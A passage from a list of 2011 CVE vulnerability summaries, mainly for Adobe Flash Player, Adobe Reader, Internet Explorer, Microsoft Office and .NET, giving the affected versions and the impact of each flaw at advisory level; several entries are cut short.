attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-2445] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2444] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011. [CVE-2011-2430] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via crafted streaming media, related to a "logic error vulnerability." [CVE-2011-2429] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, related to a "security control bypass." [CVE-2011-2428] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service (browser crash) via unspecified vectors, related to a "logic error issue." [CVE-2011-2427] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service via unspecified vectors. [CVE-2011-2426] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2425] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2417. [CVE-2011-2424] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted SWF file, as demonstrated by "about 400 unique crash signatures." [CVE-2011-2417] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2425. [CVE-2011-2416] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2138. [CVE-2011-2415] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2414. [CVE-2011-2414] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415. [CVE-2011-2383] Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release. [CVE-2011-2382] Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue. [CVE-2011-2300] Unspecified vulnerability in Oracle VM VirtualBox 4.0 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Guest Additions for Windows. [CVE-2011-2143] IBM Datacap Taskmaster Capture 8.0.1 before FP1, when Windows Authentication is enabled, allows remote attackers to obtain login access by using an incorrect password in conjunction with an account name from a different domain. [CVE-2011-2140] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2139] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers bypass the Same Origin Policy and obtain sensitive information via unspecified vectors. [CVE-2011-2138] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2416. [CVE-2011-2137] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2136] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2138 and CVE-2011-2416. [CVE-2011-2135] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2140, CVE-2011-2417, and CVE-2011-2425. [CVE-2011-2134] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2130] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2134, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415. [CVE-2011-2110] Adobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.23 and earlier on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in June 2011. [CVE-2011-2107] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.181.22 on Windows, Mac OS X, Linux, and Solaris, and 10.3.185.22 and earlier on Android, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "universal cross-site scripting vulnerability." [CVE-2011-2105] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted font data. [CVE-2011-2104] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2103] Adobe Reader and Acrobat 8.x before 8.3 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2102] Unspecified vulnerability in Adobe Reader and Acrobat before 10.1 on Windows and Mac OS X allows attackers to bypass intended access restrictions via unknown vectors. [CVE-2011-2101] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X do not properly restrict script, which allows attackers to execute arbitrary code via a crafted document, related to a "cross document script execution vulnerability." [CVE-2011-2100] Untrusted search path vulnerability in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2011-2099] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2098. [CVE-2011-2098] Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2099. [CVE-2011-2097] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2095. [CVE-2011-2096] Heap-based buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2095] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2094 and CVE-2011-2097. [CVE-2011-2094] Buffer overflow in Adobe Reader and Acrobat 8.x before 8.3, 9.x before 9.4.5, and 10.x before 10.1 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2095 and CVE-2011-2097. [CVE-2011-2075] Unspecified vulnerability in Google Chrome 11.0.696.65 on Windows 7 SP1 allows remote attackers to execute arbitrary code via unknown vectors. NOTE: as of 20110510, the only disclosure is a vague advisory that possibly relates to multiple vulnerabilities or multiple products. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2011-2041] The Start Before Logon (SBL) functionality in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.254 on Windows, and on Windows Mobile, allows local users to gain privileges via unspecified user-interface interaction, aka Bug ID CSCta40556. [CVE-2011-2039] The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904. [CVE-2011-2012] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 does not properly validate session cookies, which allows remote attackers to cause a denial of service (IIS outage) via unspecified network traffic, aka "Null Session Cookie Crash." [CVE-2011-2010] The Microsoft Office Input Method Editor (IME) for Simplified Chinese in Microsoft Pinyin IME 2010, Office Pinyin SimpleFast Style 2010, and Office Pinyin New Experience Style 2010 does not properly restrict access to configuration options, which allows local users to gain privileges via the Microsoft Pinyin (aka MSPY) IME toolbar, aka "Pinyin IME Elevation Vulnerability." [CVE-2011-2008] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Access of Unallocated Memory DoS Vulnerability." [CVE-2011-2007] Microsoft Host Integration Server (HIS) 2004 SP1, 2006 SP1, 2009, and 2010 allows remote attackers to cause a denial of service (SNA Server service outage) via crafted TCP or UDP traffic, aka "Endless Loop DoS in snabase.exe Vulnerability." [CVE-2011-2001] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via an attempted access to a virtual function table after corruption of this table has occurred, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2011-2000] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability." [CVE-2011-1999] Microsoft Internet Explorer 8 does not properly allocate and access memory, which allows remote attackers to execute arbitrary code via vectors involving a "dereferenced memory address," aka "Select Element Remote Code Execution Vulnerability." [CVE-2011-1998] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "Jscript9.dll Remote Code Execution Vulnerability." [CVE-2011-1997] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnLoad Event Remote Code Execution Vulnerability." [CVE-2011-1996] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Option Element Remote Code Execution Vulnerability." [CVE-2011-1995] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that was not properly initialized, aka "OLEAuto32.dll Remote Code Execution Vulnerability." [CVE-2011-1993] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Scroll Event Remote Code Execution Vulnerability." [CVE-2011-1992] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to read content from a different (1) domain or (2) zone via a "trial and error" attack, aka "XSS Filter Information Disclosure Vulnerability." [CVE-2011-1990] Microsoft Excel 2007 SP2 [CVE-2011-1989] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1988] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1987] Array index error in Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2011-1986] Use-after-free vulnerability in Microsoft Excel 2003 SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Use after Free WriteAV Vulnerability." [CVE-2011-1983] Use-after-free vulnerability in Microsoft Office 2007 SP2 and SP3, Office 2010 Gold and SP1, and Office for Mac 2011 allows remote attackers to execute arbitrary code via a crafted Word document, aka "Word Use After Free Vulnerability." [CVE-2011-1982] Microsoft Office 2007 SP2, and 2010 Gold and SP1, does not initialize an unspecified object pointer during the opening of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Office Uninitialized Object Pointer Vulnerability." [CVE-2011-1980] Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-1979] Microsoft Visio 2003 SP3 and 2007 SP2 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "Move Around the Block RCE Vulnerability." [CVE-2011-1978] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4 does not properly validate the System.Net.Sockets trust level, which allows remote attackers to obtain sensitive information or trigger arbitrary outbound network traffic via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Socket Restriction Bypass Vulnerability." [CVE-2011-1977] The ASP.NET Chart controls in Microsoft .NET Framework 4, and Chart Control for Microsoft .NET Framework 3.5 SP1, do not properly verify functions in URIs, which allows remote attackers to read arbitrary files via special characters in a URI in an HTTP request, aka "Chart Control Information Disclosure Vulnerability." [CVE-2011-1976] Cross-site scripting (XSS) vulnerability in the Report Viewer Control in Microsoft Visual Studio 2005 SP1 and Report Viewer 2005 SP1 allows remote attackers to inject arbitrary web script or HTML via a parameter in a data source, aka "Report Viewer Controls XSS Vulnerability." [CVE-2011-1972] Microsoft Visio 2003 SP3, 2007 SP2, and 2010 Gold and SP1 does not properly validate objects in memory during Visio file parsing, which allows remote attackers to execute arbitrary code via a crafted file, aka "pStream Release RCE Vulnerability." [CVE-2011-1969] Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 provides the MicrosoftClient.jar file containing a signed Java applet, which allows remote attackers to execute arbitrary code on client machines via unspecified vectors, aka "Poisoned Cup of Code Execution Vulnerability." [CVE-2011-1964] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Style Object Memory Corruption Vulnerability." [CVE-2011-1963] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "XSLT Memory Corruption Vulnerability." [CVE-2011-1962] Microsoft Internet Explorer 6 through 9 does not properly handle unspecified character sequences, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site that triggers "inactive filtering," aka "Shift JIS Character Encoding Vulnerability." [CVE-2011-1961] The telnet URI handler in Microsoft Internet Explorer 6 through 9 does not properly launch the handler application, which allows remote attackers to execute arbitrary programs via a crafted web site, aka "Telnet Handler Remote Code Execution Vulnerability." [CVE-2011-1960] Microsoft Internet Explorer 6 through 9 does not properly implement JavaScript event handlers, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Event Handlers Information Disclosure Vulnerability." [CVE-2011-1897] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Default Reflected XSS Vulnerability." [CVE-2011-1896] Cross-site scripting (XSS) vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "ExcelTable Reflected XSS Vulnerability." [CVE-2011-1895] CRLF injection vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, Update 1, Update 2, and SP1 allows remote attackers to inject arbitrary HTTP headers, and conduct HTTP response splitting attacks and cross-site scripting (XSS) attacks, via unspecified vectors, aka "ExcelTable Response Splitting XSS Vulnerability." [CVE-2011-1890] Cross-site scripting (XSS) vulnerability in EditForm.aspx in Microsoft Office SharePoint Server 2010 and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via a post, aka "Editform Script Injection Vulnerability." [CVE-2011-1889] The NSPLookupServiceNext function in the client in Microsoft Forefront Threat Management Gateway (TMG) 2010 allows remote attackers to execute arbitrary code via vectors involving unspecified requests, aka "TMG Firewall Client Memory Corruption Vulnerability." [CVE-2011-1847] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly enforce privilege requirements for table access, which allows remote authenticated users to modify SYSSTAT.TABLES statistics columns via an UPDATE statement. NOTE: some of these details are obtained from third party information. [CVE-2011-1846] IBM DB2 9.5 before FP7 and 9.7 before FP4 on Linux, UNIX, and Windows does not properly revoke role membership from groups, which allows remote authenticated users to execute non-DDL statements by leveraging previous inherited possession of a role, a different vulnerability than CVE-2011-0757. NOTE: some of these details are obtained from third party information. [CVE-2011-1845] Multiple memory leaks in the DataGrid control implementation in Microsoft Silverlight 4 before 4.0.60310.0 allow remote attackers to cause a denial of service (memory consumption) via an application involving (1) subscriptions to an INotifyDataErrorInfo.ErrorsChanged event or (2) a TextBlock or TextBox element. [CVE-2011-1844] Memory leak in Microsoft Silverlight 4 before 4.0.60310.0 allows remote attackers to cause a denial of service (memory consumption) via an application involving a popup control and a custom DependencyProperty property, related to lack of garbage collection. [CVE-2011-1821] IBM Tivoli Directory Server (TDS) 5.2 before 5.2.0.5-TIV-ITDS-IF0010 on Windows allows remote authenticated users to cause a denial of service (daemon hang) via a cn=changelog search. [CVE-2011-1592] The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x before 1.4.5 on Windows uses an incorrect integer data type during decoding of SETCLIENTID calls, which allows remote attackers to cause a denial of service (application crash) via a crafted .pcap file. [CVE-2011-1508] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, does not properly manage memory allocations for function pointers, which allows user-assisted remote attackers to execute arbitrary code via a crafted Publisher file, aka "Publisher Function Pointer Overwrite Vulnerability." [CVE-2011-1417] Integer overflow in QuickLook, as used in Apple Mac OS X before 10.6.7 and MobileSafari in Apple iOS before 4.2.7 and 4.3.x before 4.3.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a Microsoft Office document with a crafted size field in the OfficeArtMetafileHeader, related to OfficeArtBlip, as demonstrated on the iPhone by Charlie Miller and Dion Blazakis during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1353] Unspecified vulnerability in Adobe Reader 10.x before 10.1.1 on Windows allows local users to gain privileges via unknown vectors. [CVE-2011-1345] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, as demonstrated by Stephen Fewer as the first of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011, aka "Object Management Memory Corruption Vulnerability." [CVE-2011-1300] The Program::getActiveUniformMaxLength function in libGLESv2/Program.cpp in libGLESv2.dll in the WebGLES library in Almost Native Graphics Layer Engine (ANGLE), as used in Mozilla Firefox 4.x before 4.0.1 on Windows and in the GPU process in Google Chrome before 10.0.648.205 on Windows, allows remote attackers to execute arbitrary code via unspecified vectors, related to an "off-by-three" error. [CVE-2011-1280] The XML Editor in Microsoft InfoPath 2007 SP2 and 2010 [CVE-2011-1279] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Out of Bounds WriteAV Vulnerability." [CVE-2011-1278] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel WriteAV Vulnerability." [CVE-2011-1277] Microsoft Excel 2002 SP3, Office 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information during parsing of Excel spreadsheets, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted spreadsheet, aka "Excel Memory Corruption Vulnerability." [CVE-2011-1276] Buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1275] Microsoft Excel 2002 SP3 [CVE-2011-1274] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1273] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-1272] Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1271] The JIT compiler in Microsoft .NET Framework 3.5 Gold and SP1, 3.5.1, and 4.0, when IsJITOptimizerDisabled is false, does not properly handle expressions related to null strings, which allows context-dependent attackers to bypass intended access restrictions, and consequently execute arbitrary code, in opportunistic circumstances by leveraging a crafted application, as demonstrated by (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework JIT Optimization Vulnerability." [CVE-2011-1270] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Presentation Buffer Overrun RCE Vulnerability." [CVE-2011-1269] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-1266] The Vector Markup Language (VML) implementation in vgx.dll in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "VML Memory Corruption Vulnerability." [CVE-2011-1262] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "HTTP Redirect Memory Corruption Vulnerability." [CVE-2011-1261] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Selection Object Memory Corruption Vulnerability." [CVE-2011-1260] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2011-1258] Microsoft Internet Explorer 6 through 8 does not properly restrict web script, which allows user-assisted remote attackers to obtain sensitive information from a different (1) domain or (2) zone via vectors involving a drag-and-drop operation, aka "Drag and Drop Information Disclosure Vulnerability." [CVE-2011-1257] Race condition in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors involving access to an object, aka "Window Open Race Condition Vulnerability." [CVE-2011-1256] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Modification Memory Corruption Vulnerability." [CVE-2011-1255] The Timed Interactive Multimedia Extensions (aka HTML+TIME) implementation in Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." [CVE-2011-1254] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Drag and Drop Memory Corruption Vulnerability." [CVE-2011-1253] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.0.60831, does not properly restrict inheritance, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Class Inheritance Vulnerability." [CVE-2011-1251] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "DOM Manipulation Memory Corruption Vulnerability." [CVE-2011-1250] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Link Properties Handling Memory Corruption Vulnerability." [CVE-2011-1246] Microsoft Internet Explorer 8 does not properly handle content settings in HTTP responses, which allows remote web servers to obtain sensitive information from a different (1) domain or (2) zone via a crafted response, aka "MIME Sniffing Information Disclosure Vulnerability." [CVE-2011-1245] Microsoft Internet Explorer 6 and 7 does not properly restrict script access to content from a (1) different domain or (2) different zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Javascript Information Disclosure Vulnerability." [CVE-2011-1244] Microsoft Internet Explorer 6, 7, and 8 does not enforce intended domain restrictions on content access, which allows remote attackers to obtain sensitive information or conduct clickjacking attacks via a crafted web site, aka "Frame Tag Information Disclosure Vulnerability." [CVE-2011-1223] Buffer overflow in the Alternate Data Stream (aka ADS or named stream) functionality in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows allows local users to gain privileges via unspecified vectors. [CVE-2011-1222] Buffer overflow in the Journal Based Backup (JBB) feature in the backup-archive client in IBM Tivoli Storage Manager (TSM) before 5.4.3.4, 5.5.x before 5.5.3, 6.x before 6.1.4, and 6.2.x before 6.2.2 on Windows and AIX allows local users to gain privileges via unspecified vectors. [CVE-2011-1215] Stack-based buffer overflow in mw8sr.dll in Autonomy KeyView, as used in IBM Lotus Notes before 8.5.2 FP3, allows remote attackers to execute arbitrary code via a crafted link in a Microsoft Office document attachment, aka SPR PRAD8823ND. [CVE-2011-1103] The WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to obtain sensitive information via a request to an invalid report, which reveals the installation path in an error message, as demonstrated with requests to (1) report/infection-table.html or (2) report/productsummary-table.html. [CVE-2011-1102] Cross-site scripting (XSS) vulnerability in the WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1056] The installer for Metasploit Framework 3.5.1, when running on Windows, uses weak inherited permissions for the Metasploit installation directory, which allows local users to gain privileges by replacing critical files with a Trojan horse. [CVE-2011-1003] Double free 